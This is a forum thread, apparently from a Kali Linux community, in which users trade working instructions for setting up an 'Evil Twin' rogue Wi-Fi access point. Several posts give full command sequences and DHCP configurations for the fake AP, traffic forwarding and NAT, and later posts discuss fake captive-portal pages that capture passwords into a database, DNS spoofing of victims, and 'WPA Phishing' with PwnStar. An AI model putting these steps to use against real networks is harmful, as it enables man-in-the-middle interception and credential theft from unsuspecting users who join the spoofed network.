Results 1 to 17 of 17

Thread: How to make an Evil Twin AP in Kali.

  1. #1
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520

    How to make an Evil Twin AP in Kali.

    Hey guys. I've been looking into the Evil Twin method but haven't been able to get the DHCP3 server running. I can, however get the fake AP running and a mySQL database + server running but I need help with running the DCHP3 server. Can anyone provide instructions? (along with ip flushing and forwarding, etc). Thanks!

  2. #2
    Join Date
    2013-Mar
    Location
    http://rastamouse.me
    Posts
    86
    When I've done it, this is how:

    Commands
    Code:
    airmon-ng start wlan0
    airbase-ng -e "Evil Wi-Fu" -c 11 mon0
    ifconfig at0 10.0.0.254 netmask 255.255.255.0
    ifconfig at0 up
    ifconfig eth0 up && dhclient3 eth0
    route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.254
    ./iptables-flush.sh
    iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
    dhcpd3 -d -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcp3-server/dhcpd.pid at0
    echo 1 > /proc/sys/net/ipv4/ip_forward
    /etc/dhcpd3/dhcpd.conf
    Code:
    dens-update-style ad-hoc;
    default-lease-time 600;
    max-lease-time 7200;
    authoritative;
    subnet 10.0.0.0 netmask 255.255.255.0 {
        option subnet-mask 255.255.255.0;
        option broadcast-address 10.0.0.255;
        option routers 10.0.0.254;
        option domain-name-servers 8.8.8.8;
        range 10.0.0.1 10.0.0.140;
    }
    iptables-flush.sh
    Code:
    #!/bin/bash
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    iptables -P FORWARD ACCEPT

  3. #3
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by rastamouse View Post
    When I've done it, this is how:

    Commands
    Code:
    airmon-ng start wlan0
    airbase-ng -e "Evil Wi-Fu" -c 11 mon0
    ifconfig at0 10.0.0.254 netmask 255.255.255.0
    ifconfig at0 up
    ifconfig eth0 up && dhclient3 eth0
    route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.254
    ./iptables-flush.sh
    iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
    dhcpd3 -d -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcp3-server/dhcpd.pid at0
    echo 1 > /proc/sys/net/ipv4/ip_forward
    /etc/dhcpd3/dhcpd.conf
    Code:
    dens-update-style ad-hoc;
    default-lease-time 600;
    max-lease-time 7200;
    authoritative;
    subnet 10.0.0.0 netmask 255.255.255.0 {
        option subnet-mask 255.255.255.0;
        option broadcast-address 10.0.0.255;
        option routers 10.0.0.254;
        option domain-name-servers 8.8.8.8;
        range 10.0.0.1 10.0.0.140;
    }
    iptables-flush.sh
    Code:
    #!/bin/bash
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    iptables -P FORWARD ACCEPT
    Ok. Are you using isc dhcp server?

  4. #4
    Join Date
    2013-Dec
    Posts
    1

    Unhappy How to make an Evil Twin AP in Kali.

    Quote Originally Posted by soxrok2212 View Post
    Ok. Are you using isc dhcp server?
    I use the same system as debian kali and have a problem with dhcp3-server (installed version isc-dhcp-server), need help about dhcpd.conf and codes please..

  5. #5
    Join Date
    2013-Dec
    Posts
    3
    When I try to run this i get these errors: (copied directly from terminal)

    root@kali:~# ifconfig at0 10.0.0.254 netmask 255.255.255.0
    root@kali:~# ifconfig at0 up
    root@kali:~# ifconfig eth0 up && dhclient3 eth0
    bash: dhclient3: command not foundroot@kali:~# ifconfig at0 10.0.0.254 netmask 255.255.255.0
    root@kali:~# ifconfig at0 up
    root@kali:~# ifconfig eth0 up && dhclient3 eth0
    bash: dhclient3: command not found
    root@kali:~# route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.254
    root@kali:~# ./iptables-flush.sh
    bash: ./iptables-flush.sh: No such file or directory
    root@kali:~# iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
    root@kali:~# dhcpd3 -d -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcp3-server/dhcpd.pid at0
    bash: dhcpd3: command not found
    root@kali:~# echo 1 > /proc/sys/net/ipv4/ip_forward

    root@kali:~# route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.254
    root@kali:~# ./iptables-flush.sh
    bash: ./iptables-flush.sh: No such file or directory
    root@kali:~# iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
    root@kali:~# dhcpd3 -d -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcp3-server/dhcpd.pid at0
    bash: dhcpd3: command not found
    root@kali:~# echo 1 > /proc/sys/net/ipv4/ip_forward

    I am running kali live off of a usb. Why am I geting the "bash" responses?

  6. #6
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by tolle250 View Post
    I am running kali live off of a usb. Why am I geting the "bash" responses?
    Because those are not commands, you have to edit a dhcp file in the system.

  7. #7
    Join Date
    2014-Jan
    Posts
    1
    Here is a detailed Tutorial on how you can efficiently implement Man in the middle attack using Evil Twins.

  8. #8
    Join Date
    2013-Mar
    Posts
    65
    The proper dhcp server for Kali is isc-dhcp-server

    If you want a quick and easy way, you can install easy-creds.

  9. #9
    Join Date
    2013-Mar
    Location
    milano
    Posts
    301
    Quote Originally Posted by soxrok2212 View Post
    Hey guys. I've been looking into the Evil Twin method but haven't been able to get the DHCP3 server running. I can, however get the fake AP running and a mySQL database + server running but I need help with running the DCHP3 server. Can anyone provide instructions? (along with ip flushing and forwarding, etc). Thanks!
    hi :-)
    if this possibly can be of help to someone:
    i made a proofs on my kali-1.07(vm):

    http://vimeo.com/101170619
    http://vimeo.com/101133726

    sorry for quality && errors!
    bye
    Last edited by zimmaro; 2014-07-19 at 20:12.

  10. #10
    Join Date
    2014-Jun
    Location
    Greece
    Posts
    133
    A lightwave alternative to isc-dhcp-server is udhcpd

    Code:
    apt-get install udhcpd
    enable it:

    Code:
    sed 's%DHCPD_ENABLED="no"%DHCPD_ENABLED="yes"%g' /etc/default/udhcpd > /etc/default/udhcpd1 && mv /etc/default/udhcpd1 /etc/default/udhcpd
    create a config file:
    Code:
    cat > /etc/udhcpd.conf << EOF
    start			192.168.60.130
    end			192.168.60.140
    interface		""put here your interface to listen to, without quotas"
    lease_file		/var/lib/misc/udhcpd.leases
    pidfile			/var/run/udhcpd.pid
    option subnet		255.255.255.128
    opt	router		192.168.60.129
    opt 	broadcast	192.168.60.255
    option	dns		"put here your DNS server(s) without quotas and commas"	
    option	domain		local
    option	lease		864000
    }
    EOF
    and start it:
    Code:
    /etc/init.d/udhcpd start
    Security always begins with personal responsibility. - quietman7

  11. #11
    Join Date
    2014-May
    Location
    Valencia
    Posts
    48
    hello, i'm trying to create an evil twin ap both via command line and via scripts (pwnstar a.e.). both ways work, but i always have 2 problems:
    1- redirect to the fake portal page happens only on short-named sites: www.google.com , www.facebook.com and so on. longer names or subpages simply give a timeout error or a page unavailable error
    2- using a android/ios device i have no notification of the data required to access internet (i'm using a captive portal page that requires a username and pass) so using a smartphone simply i connect to the ap and have no access to internet. the fake page is displayed only if i use the phone browser and access the sites i said in point 1. connecting to a normal hotspot, or an AP in mcdonalds, airports and so on always prompt a popup that lead the user to the credential page....is it possible to implement something similar on a rogue ap?

    could you help me? thanks in advance
    Last edited by forumkali@yopmail.com; 2014-07-25 at 11:11.

  12. #12
    Join Date
    2013-Jul
    Posts
    841
    We suggest you use Pwnstar 9.0. The ability of clients to call up your rogueAP web page is increased if you provide internet access when using PwnStar 9.0 Read thru the threads concerning PwnStar. The author(not our team) has within the last few months issued an update - the download link is in the threads. You can easily rewrite the web pages to meet your requirments. We use the program primarily in WPA Phishing but we have written router web pages to mimic internet service providers.
    Musket Teams

  13. #13
    Join Date
    2014-May
    Location
    Valencia
    Posts
    48
    Quote Originally Posted by mmusket33 View Post
    We suggest you use Pwnstar 9.0. The ability of clients to call up your rogueAP web page is increased if you provide internet access when using PwnStar 9.0 Read thru the threads concerning PwnStar. The author(not our team) has within the last few months issued an update - the download link is in the threads. You can easily rewrite the web pages to meet your requirments. We use the program primarily in WPA Phishing but we have written router web pages to mimic internet service providers.
    Musket Teams
    hello, i'm using pwnstar 9.0 by vulpi and your version too, but i have always the same issues.

  14. #14
    Join Date
    2013-Dec
    Posts
    3
    Is it possible ? .... evil twin in offline mode ie. without internet connection ? with dns spoof
    i have tryed but i think my iptable rule are incorrect.
    every thing is working good but victim pc wont get redirct !
    so any solution ?

  15. #15
    Hello, i succesfully set up an evil twin. but im not getting any input in mysql. The Target is myself. on my laptop i get redirected to the fake ap page and i enter a password. but when i check mysql database i get Empty set (0.00 sec)
    please help

  16. #16
    Join Date
    2013-Mar
    Location
    http://rastamouse.me
    Posts
    86
    If you haven't got an Internet connection, where are you redirecting them to...? Just a page on your local web server? That is possible, you would just need your DNS Spoof to return your local IP for every DNS request.
    OSCP
    --
    If it smells like a duck, walks like a duck and quacks like a duck; then it probably is a duck.

  17. #17
    Join Date
    2013-Jul
    Posts
    841
    To: forumkali-yopmail-com

    Read thru the pwnstar thread started by Vulpi. MTeams provides a step by step method to alter your Apache2 to accept https requests.

    To: rastamouse

    If you are not providing internet access then you would be phishing to obtain a log in password or WPA Keys. Pwnstar 9 allows this. You can rewrite the internet pages to mimic the type of page you require.

    MTeams

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •